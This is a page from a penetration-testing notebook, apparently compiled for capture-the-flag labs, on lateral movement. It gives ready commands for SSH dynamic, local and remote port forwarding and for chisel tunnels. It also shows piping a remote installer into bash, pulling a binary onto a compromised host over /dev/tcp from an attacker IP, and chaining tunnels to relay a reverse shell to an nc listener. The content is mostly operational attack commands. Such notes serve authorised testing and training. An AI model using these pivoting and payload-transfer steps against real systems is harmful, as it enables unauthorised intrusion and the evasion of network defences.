🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Starter Kit
      • Linux
      • PowerShell
      • Git
      • 💾Regex
      • Nmap
      • curl
      • tcpdump
      • 🦈Wireshark
      • Metasploit
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
    • Code
      • Python Essentials
      • C & C++
    • Databases
      • MySQL
      • NoSQL
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • GDB
      • Binaries
  • Web Exploitation
    • Web Enumeration
    • Web Fuzzing
      • ffuf
      • feroxbuster
      • Gobuster
      • GoWitness
    • Main Techniques
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Command Injection
      • SQLi
        • SQLmap
      • Arbitrary File Upload
      • SSTI
      • LFI
      • XSS
    • Web Servers
      • Apache
      • Nginx
      • Werkzeug
    • Web Services/Frameworks
      • Wordpress
      • Laravel
      • Express
      • Magento
      • AIOHTTP
      • HashiCorp Vault
      • Tiny File Manager
      • Joomla
      • CMS Made Simple
      • 🌵Cacti
      • Tomcat
      • Zabbix
      • OpenNetAdmin
      • Java-based web application
        • Struts
        • .WAR
        • JDWP
      • ImageMagick
  • Cloud Exploitation
    • Kubernetes
  • Post Exploitation
    • File Transfer
    • Credential Dumping
      • Thunderbird
    • Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Docker
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Post Exploitation

Lateral Movement

SSH Tunneling

Dynamic Port Forwarding

Check proxychains port
tail /etc/proxychains.conf
Create a SOCK proxy
ssh charix@10.10.10.84 -D 9050
Now just use proxychains:
proxychains vncviewer 127.0.0.1:5901 -passwd secret

Local Port Forwarding

ssh -L 3306:localhost:3306 user@remotehost.com
Without interactive session
ssh -L 8080:127.0.0.1:8080 -N -vv rosa@10.10.11.38

Remote Port Forwarding

ssh root@10.10.10.65 -R 4443:10.10.14.6:443
chisel
Install chisel
curl https://i.jpillora.com/chisel! | bash

Transfer chisel to a target

Copy the binary
cp /usr/local/bin/chisel .
Set netcat
nc -lvnp 80 < chisel

Now on the remote host

cd /var/tmp
cat < /dev/tcp/10.10.14.172/80 > chisel
bash -c "cat < /dev/tcp/172.19.0.4/7011 > chisel"
chmod 755 /var/tmp/chisel

Create a tunnel

Start the server locally
/usr/local/bin/chisel server -p 8002 -reverse -v
Start the tunnel remotely
/var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80

Multihop tunnel for reverse shell

  • First start the new server on your attacking host:

/usr/local/bin/chisel server -p 5000 -reverse -v

  • Set also the listener:

nc -lvnp 9005

  • Now set the first hop:

/var/tmp/chisel client 10.10.14.172:5000 6010:127.0.0.1:5000

  • Finally set the second hop:

/var/tmp/chisel client 172.19.0.4:6010 7020:127.0.0.1:9005 &
PreviousThunderbirdNextPersistence

Last updated 6 hours ago